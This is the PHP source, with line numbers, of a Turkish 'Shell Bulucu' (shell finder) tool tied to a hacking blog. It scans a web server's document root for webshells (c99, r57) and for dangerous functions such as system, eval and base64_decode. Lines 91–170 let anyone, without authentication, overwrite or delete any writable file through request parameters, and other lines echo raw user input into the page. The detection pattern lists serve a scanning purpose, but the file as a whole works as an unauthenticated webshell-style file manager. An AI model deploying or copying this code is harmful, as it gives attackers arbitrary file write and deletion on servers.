1. <?php
  2. putenv("TZ=Europe/Britania");
  3. ?>
  4. <head>
  5. <title>Shell Bulucu</title>
  6. <meta charset="UTF-8">
  7. <script language="JavaScript" type="text/JavaScript">
  8. <!--
  9. function MM_openBrWindow(theURL,winName,features) { //v2.0
  10. window.open(theURL,winName,features)
  11. }
  12. //-->
  13. </script>
  14. <style type="text/css">
  15. <!--
  16. body {
  17. font-family: cursive;
  18. color: #CCCCCC;
  19. background-color: #000000;
  20. font-size: 11px;
  21. font-weight: bold;
  22. }
  23. .single{
  24. border: 1px #0ec296;
  25. padding: 5px;
  26. border-style: ridge;
  27. }
  28. a:visited {
  29. color: #33333;
  30. font-size: 11px;
  31. font-family: tahoma;
  32. text-decoration: none;
  33. }
  34. a:hover {
  35. color: #ccff00;
  36. text-decoration: none;
  37. }
  38. .abunai {
  39. color: red;
  40. text-decoration: none;
  41. }
  42. .xxx {
  43. color: #efefef;
  44. text-decoration: none;
  45. }
  46. a {
  47. color: #80ff00;
  48. font-size: 11px;
  49. font-family: tahoma;
  50. text-decoration: none;
  51. }
  52. td {
  53. border-style: solid;
  54. border-width: 0 0 1px 0;
  55. font-size:11px; font-family:Tahoma,Verdana,Arial; color:#d4c3c3;
  56. }
  57. .me {
  58. font-size:11px; font-family:Tahoma,Verdana,Arial; color:#14d2d4;
  59. border: 0px;
  60. padding: 5px;
  61. }
  62. .isi:disabled{
  63. padding: 2px;
  64. border:1px solid #333333;
  65. font-family: Tahoma;
  66. color: #333333;
  67. background-color: #000000;
  68. font-size: 10px;
  69. font-weight: bold;
  70. }
  71. .isi{
  72. padding: 2px;
  73. border:1px solid #666666;
  74. font-family: Tahoma;
  75. color: #efefef;
  76. background-color: #666666;
  77. font-size: 10px;
  78. font-weight: bold;
  79. }
  80. -->
  81. </style>
  82. <style type="text/css">
  83. #patch {position:absolute; height:1; width:1px; top:0; left:0;}
  84. </style>
  85. </head>
  86. <body>
  87. <center><img height="300px" id="images" src="https://i.imgyukle.com/2019/09/25/otXiQv.png" style="filter: brightness(2.5);"></center>
  88. <center><br><font color="#ad1f1f" size="14" face="arial">Shell bulucu</font></center><br>
  89. <?php
  90. set_time_limit(0);
  91. if(isset($_REQUEST['edit']) && $_REQUEST['edit']=='file'){
  92. if(isset($_POST['yes'])){
  93. $filename = $_GET['file'];
  94. echo "<br><br><br><font color=red size=3><b><center>".$filename." deleted...</b></font><br><br><br><br><br><br><br>";
  95. unlink($filename);
  96. echo "<META HTTP-EQUIV=Refresh CONTENT=\"2; URL=javascript:window.close();\">";
  97. }else{
  98. if($_POST['update']) {
  99. $filename = $_POST['file'];
  100. if(is_writable($filename)) {
  101. $handle = fopen($filename, "w+");
  102. $isi=$_POST['content'];
  103. fwrite($handle, stripslashes($isi));
  104. fclose($handle);
  105. $stat= "<center><strong>edit başarılı <br>";
  106. } else {
  107. $stat= "<center><font color=red><strong>Error! File may not be writable.</font></center>";
  108. }
  109. }
  110. if($_POST['close']) {
  111. echo "<META HTTP-EQUIV=Refresh CONTENT=\"0; URL=javascript:window.close();\">";
  112. }
  113. $filename = $_GET['file'];
  114. if (file_exists($filename)){
  115. $vuln = $_GET['bug'];
  116. $handle = fopen($filename, "r");
  117. $contents = fread($handle, filesize($filename));
  118. ?>
  119. <center>
  120. <table>
  121. <tr><td align="left" class="me"><strong><?=$filename?> >> Shell Türü : <?=$vuln?> <<</strong></td></tr>
  122. <tr><td class="me">
  123. <form method="post" action="">
  124. <input type="hidden" name="file" value="<?=$filename?>">
  125. <textarea name="content" cols="80" rows="15"><?=htmlspecialchars($contents)?></textarea><br>
  126. </td></tr>
  127. <tr><td align="center" class="me">
  128. <?php
  129. if($_POST['delete']) {
  130. echo "Silmek istediğinden eminmisin? ".$filename." ?";
  131. ?>
  132. <tr><td align="center" class="me">
  133. <input type="submit" name="yes" value=" E v e t ">
  134. <input type="submit" name="no" value=" H a y ı r ">
  135. <br><br><br>
  136. <center>
  137. <form>
  138. <input type="button" value="pro-ol" onclick="window.location.href='http://hack3r-s.blogspot.com/'" />
  139. </form>
  140. </center>
  141. </td></tr>
  142. <?php
  143. }else{
  144. echo $stat;
  145. ?>
  146. </td></tr>
  147. <tr><td align="right" class="me">
  148. <input type="submit" name="close" value=" K a p a t ">
  149. <input type="submit" name="delete" value=" S i l ">
  150. <input type="submit" name="update" value=" K a y d e t ">
  151. <br><br><br>
  152. <center>
  153. <form>
  154. <input type="button" value="pro -ol" onclick="window.location.href='http://hack3r-s.blogspot.com/'" />
  155. </form>
  156. </center>
  157. </td></tr>
  158. <?php
  159. }
  160. fclose($handle);
  161. ?>
  162. </table>
  163. </form>
  164. <?php
  165. }else{
  166. echo "<br><br><br><font color=red size=3><b><center>".$filename."Bulunamadı...</b></font><br><br><br><br><br><br><br>";
  167. echo "<META HTTP-EQUIV=Refresh CONTENT=\"4; URL=javascript:window.close();\">";
  168. }
  169. ?>
  170. </center>
  171. <?php
  172. }
  173. }elseif(isset($_POST['Submit'])){
  174. $ceks = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file', 'fopen');
  175. foreach($ceks as $ceker){
  176. if($_POST[$ceker]<>""){
  177. $six.=$_POST[$ceker].".";
  178. }
  179. }
  180. $cek = explode('.', $six);
  181. function ListFiles($dir) {
  182. if($dh = opendir($dir)) {
  183. $files = Array();
  184. $inner_files = Array();
  185. while($file = readdir($dh)) {
  186. if($file != "." && $file != ".." && $file[0] != '.') {
  187. if(is_dir($dir . "/" . $file)) {
  188. $inner_files = ListFiles($dir . "/" . $file);
  189. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  190. }else{
  191. array_push($files, $dir . "/" . $file);
  192. }
  193. }
  194. }
  195. closedir($dh);
  196. return $files;
  197. }
  198. }
  199. $target=$_SERVER['DOCUMENT_ROOT'];
  200. ?>
  201. <center>
  202. <table border="0" width="90%" cellpadding="5">
  203. <tr>
  204. <td class="me" align="right" width="30"><b>NO</b></td>
  205. <td class="me" align="center" width="105"><b> Tipi </b></td>
  206. <td class="me" align="center"><b> Bulundugu yer </b></td>
  207. <td class="me" align="center" width="150"><b> Son edit </b></td>
  208. <td class="me" align="right" width="80"><b>Size</b></td>
  209. </tr><br>
  210. <?php
  211. foreach (ListFiles($target) as $key=>$file){
  212. $nFile = substr($file, -4, 4);
  213. if($nFile == ".php"){
  214. if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
  215. }else{
  216. $ops = @file_get_contents($file);
  217. $op=strtolower($ops);
  218. $arr = array('c99_buff_prepare' => 'c 9 9',
  219. 'abcr57' => 'r 5 7');
  220. $sis=0;
  221. if($op)
  222. $size=filesize($file);
  223. $last_modified = filemtime($file);
  224. $last=date("M-d-Y H:i", $last_modified);
  225. foreach($arr as $key => $val) {
  226. if(@preg_match("/$key/", $op)) {
  227. $sis=1;
  228. $i++;
  229. ?>
  230. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
  231. <td align="right"><font color="red"><blink><?=$i?></blink></font></td>
  232. <td align="center"><font color="red"><blink><?=$val?></blink></font></td>
  233. <td align="left"><blink>
  234. <a href="#" class="abunai" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  235. </blink></td>
  236. <td align="center"><font color="red"><blink><?=$last?> GMT+9</blink></font></td>
  237. <td align="right"><font color="red"><blink><?=$size?> byte</blink></font></td>
  238. <script language="javascript">
  239. var bgcolor = "transparent";
  240. var change_color = "#444444"
  241. function mover(aa) {
  242. aa.style.backgroundColor = change_color;
  243. }
  244. function mout(aa) {
  245. aa.style.backgroundColor = bgcolor;
  246. }
  247. </script>
  248. </tr>
  249. <?php
  250. }
  251. }
  252. if($sis<>"1"){
  253. if((@preg_match("/system\((.*?)\)/", $op))&&(@preg_match("/<pre>/", $op))&&(@preg_match("/empty\((.*?)\)/", $op))) {
  254. $sis="2";
  255. $i++;
  256. $val="hidden shell";
  257. ?>
  258. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
  259. <td align="right"><font color="red"><?=$i?></font></td>
  260. <td align="center"><font color="red"><?=$val?></font></td>
  261. <td align="left">
  262. <a href="#" class="xxx" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  263. </td>
  264. <td align="center"><font color="red"><?=$last?> GMT+9</font></td>
  265. <td align="right"><font color="red"><?=$size?> byte</font></td>
  266. <script language="javascript">
  267. var bgcolor = "transparent";
  268. var change_color = "#444444"
  269. function mover(aa) {
  270. aa.style.backgroundColor = change_color;
  271. }
  272. function mout(aa) {
  273. aa.style.backgroundColor = bgcolor;
  274. }
  275. </script>
  276. </tr>
  277. <?php
  278. }
  279. }
  280. if($sis=="0"){
  281. foreach($cek as $bugs) {
  282. if ($bugs<>""){
  283. if(@preg_match("/$bugs\((.*?)\)/", $op)) {
  284. $i++;
  285. ?>
  286. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
  287. <td align="right"><?=$i?></td>
  288. <td align="center"><?=$bugs?></td>
  289. <td align="left">
  290. <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$bugs?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  291. </td>
  292. <td align="center"><?=$last?> GMT+9</td>
  293. <td align="right"><?=$size?> byte</td>
  294. <script language="javascript">
  295. var bgcolor = "transparent";
  296. var change_color = "#444444"
  297. function mover(aa) {
  298. aa.style.backgroundColor = change_color;
  299. }
  300. function mout(aa) {
  301. aa.style.backgroundColor = bgcolor;
  302. }
  303. </script>
  304. </tr>
  305. <div style="visibility: hidden">
  306. </div>
  307. <?php
  308. }
  309. }
  310. }
  311. }
  312. if($_POST['textV']<>""){
  313. $text=$_POST['textV'];
  314. if(@preg_match("/$text/", $op)) {
  315. $i++;
  316. ?>
  317. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
  318. <td align="right"><?=$i?></td>
  319. <td align="center"><?=$text?></td>
  320. <td align="left">
  321. <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$text?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  322. </td>
  323. <td align="center"><?=$last?> GMT+9</td>
  324. <td align="right"><?=$size?> byte</td>
  325. <script language="javascript">
  326. var bgcolor = "transparent";
  327. var change_color = "#444444"
  328. function mover(aa) {
  329. aa.style.backgroundColor = change_color;
  330. }
  331. function mout(aa) {
  332. aa.style.backgroundColor = bgcolor;
  333. }
  334. </script>
  335. </tr>
  336. <?php
  337. }
  338. }
  339. }
  340. }
  341. }
  342. if($i==0){
  343. foreach($cek as $bugs) {
  344. if ($bugs<>""){
  345. $x++;
  346. ?>
  347. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
  348. <td align="right"><?=$x?></td>
  349. <td align="center"><?=$bugs?></td>
  350. <td align="center"> Bulunamadı </td>
  351. <td align="center"> no record </td>
  352. <td align="right"> - byte </td>
  353. </tr>
  354. <?php
  355. }
  356. }
  357. }
  358. ?>
  359. </table>
  360. <?php
  361. }else{
  362. $find = array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  363. ?>
  364. <form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
  365. <center>
  366. <table class="single" width="400" border="1" cellpadding="10">
  367. <tr><td class="me"><center>
  368. <b>Tarama Tipi Seç :</b><br>
  369. <table class="me" width="200">
  370. <tr><td class="me">
  371. <script language="javascript">
  372. function cekKlik(){
  373. if (!document.fCheck.cekV.checked)
  374. document.fCheck.textV.disabled=true;
  375. else
  376. document.fCheck.textV.disabled=false;
  377. if(document.fCheck.cekV.checked){
  378. om = om + 1;
  379. }else{
  380. if(om > 0 ){
  381. om = om - 1;
  382. }else{
  383. om = om;
  384. }
  385. }
  386. if(om != 0){
  387. document.fCheck.Submit.disabled=false;
  388. }else{
  389. document.fCheck.Submit.disabled=true;
  390. }
  391. }
  392. </script>
  393. <?php
  394. //dari sini
  395. foreach($find as $bug) {
  396. ?>
  397. <script language="javascript">
  398. var om = 0;
  399. function checkValue<?=$bug?>(){
  400. if(document.fCheck.<?=$bug?>.checked){
  401. om = om + 1;
  402. }else{
  403. if(om > 0 ){
  404. om = om - 1;
  405. }else{
  406. om = om;
  407. }
  408. }
  409. if(om != 0){
  410. document.fCheck.Submit.disabled=false;
  411. }else{
  412. document.fCheck.Submit.disabled=true;
  413. }
  414. }
  415. </script>
  416. <input onclick="checkValue<?=$bug?>();" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" /> <?=$bug?><br>
  417. <?php
  418. }
  419. ?>
  420. <input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV" value="cekV">
  421. <input class="isi" disabled="disabled" name="textV" value="Diğer" onFocus="this.select()" type="text" id="textV">
  422. <br><br>
  423. <input type="hidden" name="asal" value="abcd">
  424. <input disabled="disabled" type="submit" name="Submit" value=" SALDIR " />
  425. </td></tr>
  426. </table>
  427. </td></tr></table>
  428. </form>
  429. <?
  430. }
  431. ?>
  432. <br><br><hr width="300">
  433. <center style="color: #f01414;">
  434. www.hack3r-s.blogspot.com
  435. <br><br><br>
  436. <img src="https://i.imgyukle.com/2019/09/25/otc8i0.png"style="width:60px;"><br>
  437. </center>
  438. </body>

YamazaKi